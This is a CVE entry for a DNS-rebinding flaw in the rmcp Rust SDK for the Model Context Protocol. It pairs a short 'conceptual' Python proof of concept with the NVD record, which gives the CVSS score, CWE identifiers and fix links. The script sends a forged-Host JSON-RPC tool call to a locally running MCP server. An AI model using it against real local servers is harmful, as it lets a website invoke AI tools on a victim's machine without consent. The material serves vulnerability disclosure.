CVE-2026-42559

# Conceptual PoC demonstrating the impact of missing Host header validation # Attacker side script to simulate the request sent after DNS rebinding import requests def exploit_local_mcp(target_ip, target_port, malicious_host): """ Simulates a request sent by a browser to a local service after DNS rebinding. The Host header is set to the attacker's domain to bypass potential checks that might rely on it, though in this specific vuln, the check is MISSING. """ url = f"http://{target_ip}:{target_port}/api/endpoint" headers = { "Host": malicious_host, # The server fails to validate this "User-Agent": "Mozilla/5.0 (Attacker Browser)", "Content-Type": "application/json" } # Malicious payload to be executed on the local server payload = { "jsonrpc": "2.0", "method": "tools/call", "params": { "name": "malicious_tool", "arguments": {} }, "id": 1 } try: response = requests.post(url, json=payload, headers=headers, timeout=5) print(f"[+] Request sent to {url} with Host: {malicious_host}") print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Body: {response.text}") except Exception as e: print(f"[-] Exploit failed: {e}") # Usage Example # exploit_local_mcp("127.0.0.1", 8080, "attacker.com")

{"cve": {"id": "CVE-2026-42559", "sourceIdentifier": "[email protected]", "published": "2026-05-14T15:16:46.750", "lastModified": "2026-05-14T17:19:49.973", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "RMCP is an official Rust SDK for the Model Context Protocol. Prior to version 1.4.0, the rmcp crate's Streamable HTTP server transport (crates/rmcp/src/transport/streamable_http_server/) did not validate the incoming Host header. This allowed a malicious public website, via a DNS rebinding attack, to send authenticated requests to an MCP server running on the victim's loopback or private-network interface. This vulnerability is fixed in 1.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-346"}, {"lang": "en", "value": "CWE-350"}]}], "references": [{"url": "https://github.com/modelcontextprotocol/rust-sdk/commit/8e22aa2de28df5a285eed87c11cd89bf15fa90d3", "source": "[email protected]"}, {"url": "https://github.com/modelcontextprotocol/rust-sdk/issues/815", "source": "[email protected]"}, {"url": "https://github.com/modelcontextprotocol/rust-sdk/issues/822", "source": "[email protected]"}, {"url": "https://github.com/modelcontextprotocol/rust-sdk/pull/764", "source": "[email protected]"}, {"url": "https://github.com/modelcontextprotocol/rust-sdk/security/advisories/GHSA-89vp-x53w-74fx", "source": "[email protected]"}]}}